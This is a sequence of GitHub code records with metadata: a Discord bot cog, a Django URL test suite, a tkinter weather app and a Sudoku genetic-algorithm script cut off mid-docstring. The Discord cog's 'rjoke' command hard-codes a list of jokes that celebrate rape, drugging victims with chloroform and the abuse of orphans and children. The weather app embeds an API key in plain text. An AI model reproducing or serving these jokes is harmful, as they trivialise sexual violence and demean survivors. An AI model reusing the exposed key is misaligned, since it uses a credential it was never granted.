(c) 2021 Trenton \"Kawasaki\" G\r\n:terms: No Public Use\r\n:visibilty: Private Cog\r\n\r\n\"\"\"\r\n\r\n#Discord\r\nimport discord\r\nfrom discord.ext import commands\r\n\r\n#Others\r\nfrom akaneko import akaneko\r\nimport random\r\nimport ast\r\nfrom AntiSpam.Util import transform_message\r\nfrom discord.ext.buttons import Paginator\r\nfrom __utils__.util import *\r\n\r\nclass Forbidden(commands.Cog, name=\"Forbidden\"):\r\n\tdef __init__(self, bot):\r\n\t\tself.bot = bot\r\n\r\n\t#This command exists for security reasons. 
don't remove my bot ;-;\r\n\t@commands.command()\r\n\tasync def servers(self, ctx):\r\n\t activeservers = self.bot.guilds\r\n\t for guild in activeservers:\r\n\t await ctx.send(f\"`{guild.name}` : `{guild.id}`\")\r\n\r\n\t@commands.command(aliases=['disconnect', 'close', 'stopbot'])\r\n\t@commands.is_owner()\r\n\tasync def logout(self, ctx):\r\n\t await ctx.send(f\"Hasta Luego :wave:\")\r\n\t await self.bot.close()\r\n\r\n\t@commands.command(\"test\")\r\n\t@commands.is_owner()\r\n\tasync def testing(self, ctx):\r\n\t await ctx.send(f\"I work as intended :D\")\r\n\r\n\t@commands.command(name=\"owner\")\r\n\t@commands.is_owner()\r\n\tasync def forbidden_commands(self, ctx):\r\n\r\n\t embed = discord.Embed(title=f'Owner Only Commands', description='Here are my __OWNER-ONLY__ Modules! Type These In My DMs', colour=0xC0C0C0, timestamp=ctx.message.created_at)\r\n\r\n\t embed.add_field(name='Turns off the bot', value=\"`c!logout`\", inline=False)\r\n\t embed.add_field(name='DM Anyone you want.', value=\"`c!dm `\", inline=False)\r\n\t embed.add_field(name='Sends The Shard Count.', value=\"`c!present_shard`\", inline=False)\r\n\t embed.add_field(name='Bypass all checks & cooldowns.', value=\"`c!sudo `\", inline=False)\r\n\t embed.add_field(name='Disables a command', value=\"`c!unload `\", inline=False)\r\n\t embed.add_field(name='Enables a disabled command', value=\"`c!reload `\", inline=False)\r\n\t embed.add_field(name='Pushes an Announcement to the Cryptide server for a new release', value=\"`c!release`\", inline=False)\r\n\t embed.add_field(name='Updates the bot', value=\"`c!update `\", inline=False)\r\n\t embed.add_field(name='Sends a list of servers the bot is in', value=\"`c!servers`\", inline=False)\r\n\r\n\t embed.set_footer(text=f\"Carpe Noctem | {self.bot.user.name}\")\r\n\t embed.set_author(name=self.bot.user.name, icon_url=self.bot.user.avatar_url)\r\n\r\n\t await ctx.author.send(embed=embed)\r\n\t await ctx.send(\"I've DM'd You The List!\")\r\n\r\n\t@commands.command()\r\n\tasync def nsfwexperimental(self, ctx):\r\n\t await ctx.send(akaneko.nsfw.masturbation())\r\n\r\n\t@commands.command()\r\n\tasync def rjoke(self, ctx):\r\n\t\tif ctx.channel.is_nsfw():\r\n\t\t\ttitles = ['What do 9 out of 10 people enjoy? \\ngang rape :D',\r\n\t \t'Rape is such an ugly word, I prefer the term struggle snuggle.',\r\n\t \t'I saw a man trying to rape a girl, i decided to help, she didn’t stand a chance against both of us',\r\n\t \t'99% of women kiss with their eyes closed, that’s why it’s so hard to identify the rapist.',\r\n\t \t'No means no, but if you use chloroform it’s a guaranteed yes.',\r\n\t \t'Guy walks into a bar. Sees a hot girl. Walks up to her and says “your getting laid tonight” She replies “what are you some sort of psychic” He says “No i’m just stronger than you”.',\r\n\t \t'How can you tell that a pedophile likes music? \\nHe rapes D minor',\r\n\t \t'If you’re ever bored, just rape an orphan! What’re they gonna do, tell their parents?',\r\n\t \t'What’s the hardest thing about losing your virginity? Making sure she doesn’t wake up.',\r\n\t \t'Its only rape if she finds out.',\r\n\t \t'What do You call a gun that rapes someone? An assault rifle.',\r\n\t \t'Consent is just some fucked up feminist propaganda.',\r\n\t \t'She said no. So I raped her.']\r\n\t\t\tawait ctx.send(f\"{random.choice(titles)}\")\r\n\t\telse:\r\n\t\t\tawait ctx.send(\"HEY! What are you doing??? 
This isn't an NSFW Channel....\")\r\n\r\n\r\n\t@commands.command()\r\n\t@commands.is_owner()\r\n\tasync def present_shard(self, ctx):\r\n\t shard = discord.AutoShardedClient\r\n\t await ctx.send(f\"{shard.shards} Is Present\")\r\n\r\n\t@commands.command(name=\"unload\")\r\n\t@commands.is_owner()\r\n\tasync def unload(self, ctx, command_name):\r\n\t command = self.bot.get_command(command_name)\r\n\t command.enabled = False\r\n\t await ctx.send(f\"`{command_name}` has been unloaded.\")\r\n\r\n\t@commands.command(name=\"reload\")\r\n\t@commands.is_owner()\r\n\tasync def reload(self, ctx, command_name):\r\n\t command = self.bot.get_command(command_name)\r\n\t command.enabled = True\r\n\t await ctx.send(f\"`{command_name}` has been reloaded.\")\r\n\r\n\t@commands.command()\r\n\t@commands.is_owner()\r\n\tasync def release(self, ctx):\r\n\t release_role_id = 827825413706481664\r\n\t release_ping_str = f\"<@&{release_role_id}>\"\r\n\r\n\t questions = [\r\n [\r\n \"What type of release is this?\",\r\n \"1 | Regular Release\\n2 | Security Release\",\r\n ],\r\n [\"What version are you releasing?\", \"\\u2009\"],\r\n [\"What is the content for this release?\", \"\\u2009\"],\r\n ]\r\n\t answers = [\r\n\t await get_message(self.bot, ctx, question[0], question[1], timeout=500)\r\n\t for question in questions\r\n ]\r\n\r\n\t color_enum = {\r\n \"1\": 0x6E6E6E, # Dark Color\r\n \"2\": 0x4D4D4D, # Even Darker Color\r\n }\r\n\t color = color_enum.get(answers[0], 0x6E6E6E)\r\n\r\n\t tag = answers[1]\r\n\t if \"v\" not in tag.lower():\r\n\t tag = f\"V{tag}\"\r\n\t tag = tag.capitalize().replace(\" \", \"\")\r\n\r\n\t desc = f\"{answers[2]}\\n\\n------------\\nEnjoy :D\"\r\n\r\n\t embed = discord.Embed(\r\n title=f\"**Bot Release:** `{tag}`\",\r\n description=desc,\r\n color=color,\r\n timestamp=ctx.message.created_at,\r\n )\r\n\t embed.set_footer(text=ctx.author.name, icon_url=ctx.author.avatar_url)\r\n\r\n\t if await review_embed(self.bot, ctx, embed):\r\n\t channel = await self.bot.fetch_channel(827772052337328170)\r\n\t await channel.send(release_ping_str, embed=embed)\r\n\t await ctx.send(f\"Announcement Sent.\")\r\n\t else:\r\n\t await ctx.send(\"Cancelled.\")\r\n\r\ndef setup(bot):\r\n bot.add_cog(Forbidden(bot))", "repo_name": "akaKawasaki/cryptide-db", "sub_path": "Cryptide/__modules__/Forbidden.py", "file_name": "Forbidden.py", "file_ext": "py", "file_size_in_byte": 6401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 27, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 27, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 32, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 38, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 38, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 39, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 39, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 44, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 44, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 45, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 45, "usage_type": "name"}, {"api_name": "discord.Embed", 
"line_number": 53, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 49, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 49, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 50, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 50, "usage_type": "name"}, {"api_name": "akaneko.akaneko.nsfw.masturbation", "line_number": 73, "usage_type": "call"}, {"api_name": "akaneko.akaneko.nsfw", "line_number": 73, "usage_type": "attribute"}, {"api_name": "akaneko.akaneko", "line_number": 73, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 71, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 71, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 91, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 75, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 75, "usage_type": "name"}, {"api_name": "discord.AutoShardedClient", "line_number": 99, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.command", "line_number": 96, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 96, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 97, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 97, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 102, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 102, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 103, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 103, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 109, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 109, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 110, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 110, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 148, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 116, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 116, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 117, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 117, "usage_type": "name"}]} +{"seq_id": "10887510282", "text": "from http import HTTPStatus\nfrom django.contrib.auth import get_user_model\nfrom django.core.cache import cache\nfrom django.test import TestCase, Client\nfrom django.urls import reverse\n\nfrom ..models import Group, Post\n\nUser = get_user_model()\n\n\nclass ProjectURLTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.authorized_client = Client()\n cls.authors_client = Client()\n cls.authorized_user = User.objects.create_user(username='HasNoName')\n cls.authorized_client.force_login(cls.authorized_user)\n cls.post_author = User.objects.create(username='TestAuthor')\n cls.authors_client.force_login(cls.post_author)\n\n cls.post = Post.objects.create(\n author=cls.post_author,\n text='Test text',\n )\n cls.group = Group.objects.create(\n title='Test group',\n description='Big Bada Boom!',\n slug='test_group',\n )\n\n cls.unauthorized_user_available_pages = {\n reverse('posts:index'): 'posts/index.html',\n reverse('posts:group_list', 
args=(cls.group.slug,)):\n 'posts/group_list.html',\n reverse('posts:profile', args=(cls.post_author.username,)):\n 'posts/profile.html',\n reverse('posts:post_detail', args=(cls.post.id,)):\n 'posts/post_detail.html'\n }\n\n def setUp(self):\n cache.clear()\n\n def test_unauthorized_pages_availability(self):\n \"\"\"Check if anonymous-allowed pages are available\n for an anonymous user.\"\"\"\n\n for url in self.unauthorized_user_available_pages:\n with self.subTest(url=url):\n response = self.client.get(url)\n self.assertEqual(response.status_code, HTTPStatus.OK, url)\n\n def test_unauthorized_templates_correctness(self):\n \"\"\"Are expected templates available to an unauthorized user.\"\"\"\n\n for address, tmpl in self.unauthorized_user_available_pages.items():\n with self.subTest(address=address):\n response = self.client.get(address)\n self.assertEqual(response.status_code, HTTPStatus.OK, address)\n self.assertTemplateUsed(response, tmpl)\n\n def test_edit_other_persons_post_redirect(self):\n \"\"\"Check redirects when an authenticated user tries\n to edit other user's post.\"\"\"\n\n response = self.authorized_client.get(\n reverse('posts:post_edit', args=(self.post.id,)), follow=True\n )\n self.assertRedirects(\n response, reverse('posts:post_detail', args=(self.post.id,))\n )\n\n def test_unauthorized_user_private_pages_redirect(self):\n \"\"\"Check if the redirects are working when an unauthenticated\n user visits private pages.\"\"\"\n\n login_url = reverse('users:login')\n pages = {\n reverse('posts:post_create'),\n reverse('posts:post_edit', args=(self.post.id,))\n }\n for url in pages:\n with self.subTest(url=url):\n response = self.client.get(url, follow=True)\n self.assertRedirects(\n response, f'{login_url}?next={url}'\n )\n\n def test_edit_and_create_availability_for_post_author(self):\n \"\"\"Are the pages available when an authorized user\n creates or edits a post.\"\"\"\n\n pages = {\n reverse('posts:post_create'),\n reverse('posts:post_edit', args=(self.post.id,))\n }\n for url in pages:\n with self.subTest(url=url):\n response = self.authors_client.get(url)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_authors_create_and_edit_templates(self):\n \"\"\"Check if the templates are correct when an authorized\n user creates or edits a post.\"\"\"\n\n correct_templates = {\n reverse('posts:post_create'): 'posts/create_post.html',\n reverse('posts:post_edit', args=(self.post.id,)):\n 'posts/create_post.html',\n }\n for address, tmpl in correct_templates.items():\n with self.subTest(address=address):\n response = self.authors_client.get(address)\n self.assertTemplateUsed(response, tmpl)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n", "repo_name": "holohup/yatube_subscriptions_en", "sub_path": "yatube/posts/tests/test_urls.py", "file_name": "test_urls.py", "file_ext": "py", "file_size_in_byte": 4362, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 9, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "django.test.Client", "line_number": 16, "usage_type": "call"}, {"api_name": "django.test.Client", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Post.objects.create", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 
23, "usage_type": "name"}, {"api_name": "models.Group.objects.create", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 27, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 39, "usage_type": "call"}, {"api_name": "django.core.cache.cache.clear", "line_number": 44, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 44, "usage_type": "name"}, {"api_name": "http.HTTPStatus.OK", "line_number": 53, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 53, "usage_type": "name"}, {"api_name": "http.HTTPStatus.OK", "line_number": 61, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 61, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 69, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 72, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 79, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 81, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 82, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 96, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 97, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 102, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 102, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 109, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 110, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 117, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 117, "usage_type": "name"}]} +{"seq_id": "74360013955", "text": "import tkinter as tk\r\nfrom tkinter import *\r\nimport requests\r\nimport time\r\nimport datetime\r\n\r\n\r\ndef getData(self):\r\n city = inputbox.get()\r\n api = \"https://api.openweathermap.org/data/2.5/weather?q=\" + \\\r\n city+\"&appid=06c921750b9a82d8f5d1294e1586276f\"\r\n\r\n json_data = requests.get(api).json()\r\n city = json_data['name']\r\n country = json_data['sys']['country']\r\n temperature = int(json_data['main']['temp'] - 273.15)\r\n icon = json_data['weather'][0]['icon']\r\n weather = json_data['weather'][0]['main']\r\n min_temp = int(json_data['main']['temp_min'] - 273.15)\r\n max_temp = int(json_data['main']['temp_max'] - 273.15)\r\n humidity = json_data['main']['humidity']\r\n wind = json_data['wind']['speed']\r\n timezone = json_data['timezone']\r\n timedifference = timezone - 19800\r\n sunrise = time.strftime('%H:%M', time.gmtime(\r\n json_data['sys']['sunrise'] + timezone))\r\n sunset = time.strftime('%H:%M', time.gmtime(\r\n json_data['sys']['sunset'] + timezone))\r\n\r\n final_info = city + \", \" + country + \"\\n\" + str(temperature) + \"°C\"\r\n final_data = \"\\n\" + weather + \"\\n\" + \"Min/Max: \" + str(min_temp)+\"/\"+str(max_temp) + \"°C\" + \"\\n\" + \"Humidity: \" + str(\r\n humidity) + \"%\" + \"\\n\" + \"Wind Speed: \" + str(wind) + \"km/h \\n\" + \"Sunrise: \" + sunrise + \"hrs \\n\" + \"Sunset: \" + sunset + \"hrs\"+\"\\nLocal Time: \"+getTime(timedifference)\r\n\r\n 
label1.config(text=final_info)\r\n label3.config(text=final_data)\r\n\r\n image = PhotoImage(file=f\"resources/icons/{icon}.png\")\r\n label2.config(image=image, bg=\"sky blue\")\r\n label2.image = image\r\n\r\n\r\n# structure\r\napp = tk.Tk()\r\napp.geometry(\"360x480\")\r\napp.title(\"Weather App.\")\r\napp.resizable(False, False)\r\napp.iconbitmap(\"resources/icon.ico\")\r\napp.config(bg=\"sky blue\")\r\n\r\n# fonts\r\nfont0 = (\"Calibri\", 10, \"bold\", \"italic\")\r\nfont1 = (\"Calibri\", 15, \"bold\")\r\nfont2 = (\"Calibri\", 20, \"bold\")\r\nfont3 = (\"Calibri\", 30, \"bold\")\r\n\r\n# input (NOTE: tk.Entry has no 'text' option, so the invalid keyword is dropped here)\r\ninputbox = tk.Entry(app, font=font1, bg=\"white\", width=50)\r\ninputbox.pack(padx=25, pady=10)\r\ninputbox.focus()\r\ninputbox.bind('<Return>', getData)\r\n\r\n# labels\r\nlabel0 = tk.Label(app, font=font0, bg=\"sky blue\", text=\"enter city name...\")\r\nlabel0.pack()\r\nlabel1 = tk.Label(app, font=font3, bg=\"sky blue\")\r\nlabel1.pack()\r\nlabel2 = tk.Label(app)\r\nlabel2.pack()\r\nlabel3 = tk.Label(app, font=font1, bg=\"sky blue\")\r\nlabel3.pack()\r\n\r\n\r\ndef getTime(timedifference):\r\n now = time.time()\r\n localtime = now + timedifference\r\n timestr = datetime.datetime.strptime(\r\n time.ctime(localtime), \"%a %b %d %H:%M:%S %Y\")\r\n timestr = timestr.strftime(\"%H:%Mhrs %a, %d %b %Y\")\r\n return timestr\r\n\r\n\r\napp.mainloop()\r\n", "repo_name": "BennettChristopher/WeatherApp", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2679, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 25, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 25, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 27, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 27, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 43, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 57, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 63, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 67, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 69, "usage_type": "call"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 76, "usage_type": "attribute"}, {"api_name": "time.ctime", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "9683993517", "text": "import matplotlib.pyplot as plt\nfrom random import choice, randint, uniform, shuffle, sample\n\n\n####################\n# FITNESS FUNCTION #\n####################\ndef extract_subgrids(sudoku_grid, i):\n \"\"\"\n Extract the 9 elements from a (3 x 3) sub-grid in a (9 x 9) Sudoku solution.\n :param sudoku_grid: The specified 9 x 9 Sudoku solution grid.\n :param i: The flat index of the sub-grid's top-left cell\n :return: Returns a list of 9 integers that are part of a specified Sudoku sub-grid.\n \"\"\"\n return sudoku_grid[i:i + 3] + sudoku_grid[i + 9:i + 12] + sudoku_grid[i + 18:i + 21]\n\n\ndef extract_all_subgrids(sudoku_grid):\n \"\"\"\n Divide a flat vector into vectors with 9 elements, representing 3 x 3 boxes in the corresponding 9 x 9 2D vector.\n These are the standard Sudoku boxes.\n
:param sudoku_grid: The specified 9 x 9 Sudoku solution\n :return: Returns the list of 3 x 3 grids in a 9 x 9 Sudoku solution\n \"\"\"\n return [extract_subgrids(sudoku_grid, i) for i in [0, 3, 6, 27, 30, 33, 54, 57, 60]]\n\n\ndef make_sudoku_2D(sudoku_grid):\n \"\"\"\n Function will take a flat vector of 81 integers and reshape it into a 2-D (9 x 9) Sudoku grid.\n :param sudoku_grid: The specified 9 x 9 Sudoku solution\n :return: Returns a list of 9 rows of 9 integers, restoring the (9 x 9) structure of the Sudoku grid\n \"\"\"\n return [sudoku_grid[i * 9:(i + 1) * 9] for i in range(9)]\n\n\ndef consistency(sudoku_grid):\n \"\"\"\n Function will check how many different elements there are in each row. Ideally there should be 9 different elements,\n if there are no duplicates. This function can also be used for columns by applying the built-in zip() function\n as such: zip(*sudoku_grid).\n :param sudoku_grid: The 2-D Sudoku grid (a sequence of rows) whose rows will be checked for duplicates.\n :return: Returns an integer value for the number of conflicts\n \"\"\"\n conflict_score = 0\n visited = []\n\n # Iterate through every cell in every row in a 9x9 Sudoku grid.\n for row in sudoku_grid:\n for i in range(len(row)):\n # If the cell value has not been visited, append the value to the visited list.\n if row[i] not in visited:\n visited.append(row[i])\n else:\n conflict_score += 1\n visited = []\n\n return conflict_score\n\n\ndef fitness_sudoku(candidate_solution):\n \"\"\"\n Solution strings are evaluated by counting the number of duplicate symbols in rows, columns and (3 x 3) sub-grids,\n creating a fitness score. Fewer duplicates means a better solution string, so a lower fitness score is better.\n :param candidate_solution: An individual candidate solution for a sudoku puzzle to be specified\n :return: Returns the total fitness score of the evaluated candidate solution for a sudoku puzzle.\n \"\"\"\n\n # Checks consistency of the rows by giving fitness score based on the number of conflicts in each row.\n sudoku_solution = make_sudoku_2D(candidate_solution)\n fitness_score = consistency(sudoku_solution)\n\n # Checks consistency of columns by giving fitness score based on the number of conflicts in each column.\n fitness_score += consistency(zip(*sudoku_solution))\n\n # Checks consistency of sub-sudoku grids by giving fitness score based on number of conflicts in each (3 x 3) grid.\n fitness_score += consistency(extract_all_subgrids(candidate_solution))\n\n return fitness_score\n\n\n##############################\n# INDIVIDUAL-LEVEL OPERATORS #\n##############################\n\n# FUNCTIONS FOR GENERATING SUDOKU GRID SOLUTION SPACES\ndef generate_sudoku_grid(filename):\n \"\"\"\n Function combines the 3 functions below to easily generate a (9 x 9) Sudoku grid, where all numbers that\n were in the text file are filled and fixed into their corresponding positions, while all the “.” characters are\n replaced with integer zeros, and later filled in with numbers ranging from 1 to 9.\n :param filename: The specified text file\n :return: List of lists of integers with all 0s replaced.\n \"\"\"\n sudoku_list = divideList(generate_array(filename), 9)\n random_solution = replaceZeros(sudoku_list)\n return random_solution\n\n\ndef generate_array(filename):\n \"\"\"\n Function generates a list of 81 integers by replacing any '.' 
with a 0, and subsequently ignoring any other\n character from a specified text file that is not going to be part of the list.\n :param filename: The file path to be specified.\n :return: A list of 81 integers.\n \"\"\"\n sudoku_list_of_numbers = []\n sudokuGrid = open(filename, \"r\")\n\n # Walk through each line of the text file character by character; separator characters are skipped below.\n for eachLine in sudokuGrid:\n for character in eachLine:\n if character == '.':\n sudoku_list_of_numbers.append(0)\n\n elif character == '-' or character == '\\n' or character == '!':\n continue\n\n else:\n sudoku_list_of_numbers.append(int(character))\n\n return sudoku_list_of_numbers\n\n\ndef replaceZeros(created_grid):\n \"\"\"\n Function replaces 0 with a random value from 1 to 9, essentially filling an unfilled Sudoku cell.\n :param created_grid: The list of lists (sudoku grid) to be specified\n :return: Returns the newly non-zero sudoku grid\n \"\"\"\n candidate_grid = []\n\n # First for-loop cycles through every row of the created grid from the text file\n for every_row in created_grid:\n candidate_row = []\n\n # For each row, it will check whether the number in the given index is 0, meaning that Sudoku cell is unfilled.\n for number in range(0, 9):\n\n # If 0, attempt to replace that 0 with a random integer ranging from 1 to 9\n if every_row[number] == 0:\n rand_number = randint(1, 9)\n\n # While the random number exists in the current row or the new candidate row list, attempt to generate\n # another random value from 1 to 9 to replace old integer value of rand_number\n while rand_number in every_row or rand_number in candidate_row:\n rand_number = randint(1, 9)\n\n # Append that number onto the currently-checked row\n candidate_row.append(rand_number)\n\n # Otherwise, if that value in the given index of that Sudoku row is anything but 0, append it.\n # This ensures that numbers from the text file that were initially hardcoded onto the file will remain in\n # the following sudoku row, unless it is a 0 (Represents \".\").\n else:\n candidate_row.append(every_row[number])\n\n # After all numbers have been filled in the selected row, append it to a new list, which will create and form\n # the 9 x 9 sudoku grid.\n candidate_grid.append(candidate_row)\n\n return candidate_grid\n\n\ndef divideList(sudoku_list, number_of_sublists):\n \"\"\"\n Function divides the list of 81 integers into 9 small sub-lists of integers.\n :param sudoku_list: The list of integers to be specified.\n :param number_of_sublists: The desired size of each sub-list (for an 81-cell grid, a size of 9 also yields 9 sub-lists).\n :return: A list of sub-lists of integers.\n \"\"\"\n number_of_sublists = max(1, number_of_sublists)\n list_of_lists = [sudoku_list[i:i + number_of_sublists] for i in range(0, len(sudoku_list), number_of_sublists)]\n return list_of_lists\n\n\n# Crossover Operator for Chosen Representation\ndef crossover_individual(sudoku_grid1, sudoku_grid2):\n \"\"\"\n Returns a list of randomly chosen rows from 2 sudoku grids. 
This is a uniform crossover, where bits are randomly\n copied from the first or from the second parent.\n :param sudoku_grid1: The first sudoku grid, which will be random.\n :param sudoku_grid2: The second sudoku grid, which will be random.\n :return: A list of sudoku rows of 9 integers from different sudoku grids.\n \"\"\"\n # Performs a uniform crossover by zipping 2 candidate solutions together and extracting a row from them, creating\n # a new breed.\n return [choice(row) for row in zip(sudoku_grid1, sudoku_grid2)]\n\n\n# Mutation Operator for Chosen Representation\ndef mutate_individual(sudoku_grid, filename):\n \"\"\"\n Function performs swapping of numbers in a random number of rows, depending on the fitness score of the candidate\n Sudoku solution grid. Number swapping will only happen on those that were originally represented as \".\" in the text\n file.\n :param sudoku_grid: The specified list of lists, representing a 9 x 9 sudoku grid.\n :param filename: The specified text file\n :return: The same sudoku grid with the specified rows swapped.\n \"\"\"\n # The base_grid is a form of reference to properly select which numbers to swap without affecting the predetermined\n # cells. Within this function, the base_grid will be used to cross-check and also make use of the same text file\n # used to create the candidate solutions\n base_grid = divideList(generate_array(filename), 9)\n\n # This is a list to store all indexes of the possible sudoku cells that can be swapped with one another.\n rand_index = []\n randomness = uniform(0, 1)\n\n # rand_row = randint(0, 8)\n # rand_sub_row = randint(0, 2)\n\n # This selects the number of rows chosen to mutate depending on the fitness score of a candidate solution.\n # If fitness score / 5 is greater than 8, the number of rows selected is capped at 8.\n num_rows = min(8, fitness_sudoku(sudoku_grid) // 5)\n row_indexes = sample([x for x in range(9)], num_rows)\n\n for i in row_indexes:\n # Reset the index list for every row so indexes from a previous row never leak into the next swap.\n rand_index = []\n\n for number in range(len(base_grid[i])):\n\n # If the value found on the specified row of the base grid is 0, append that index into the rand_index list.\n if base_grid[i][number] == 0:\n rand_index.append(number)\n\n # If the length of the list of indexes is greater than 1, shuffle them and extract 2 indexes based on a pop().\n if len(rand_index) > 1 and randomness > MUTATION_RATE:\n shuffle(rand_index)\n rand1 = rand_index.pop()\n rand2 = rand_index.pop()\n\n # This is where 2 of the random indexes will be used to select sudoku cells on the same row and swap their\n # values.\n temp = sudoku_grid[i][rand1]\n sudoku_grid[i][rand1] = sudoku_grid[i][rand2]\n sudoku_grid[i][rand2] = temp\n\n return sudoku_grid\n\n\n##############################\n# POPULATION-LEVEL OPERATORS #\n##############################\n# Loops through the population size\ndef generate_population(filename, population_size):\n \"\"\"\n Function takes specified file path to generate the solution spaces for a specified population size, which is\n essentially the number of possible sudoku solutions to be generated.\n :param filename: The specified text file.\n :param population_size: The desired population integer size.\n :return: A list of sudoku solution spaces according to the population size (integer).\n \"\"\"\n population_list = []\n\n # In this loop, for a number of iterations based on the population size, every candidate solution generated will\n # be appended\n for each_solution 
in range(population_size):\n solution_space = generate_sudoku_grid(filename)\n population_list.append(solution_space)\n\n return population_list\n\n\ndef generate_fitness_scores(pop_list):\n \"\"\"\n Function goes through a population size list of sudoku grid solutions, iterates through them and produces a fitness\n score for each of them, stored in a list.\n :param pop_list: The specified population size list of sudoku solution spaces.\n :return: A list of fitness scores based on the number of solution spaces specified in population list.\n \"\"\"\n # Initialise a flat list (each 9 x 9 grid is flattened into it before scoring) and the list of scores.\n flat_list = []\n fitness_scores = []\n\n # Iterate through each solution space\n for each_solution in pop_list:\n # Ensure that you append all values in one solution space into the flat list.\n for each_row in each_solution:\n for number in each_row:\n flat_list.append(number)\n\n # Find the fitness score of that solution list of integers, then append and reset flat_list = []\n fitness_score = fitness_sudoku(flat_list)\n fitness_scores.append(fitness_score)\n flat_list = []\n\n return fitness_scores\n\n\ndef select_population(population_list, fitness_population):\n \"\"\"\n Selects a specified percentage of a list of candidate sudoku solutions by first sorting the population based\n on the fitness scores of every candidate solution, and only taking a specified percentage of them to be used in the\n evolutionary algorithm.\n :param population_list: The list population_lists.\n :param fitness_population: The list fitness_scores.\n :return: A new 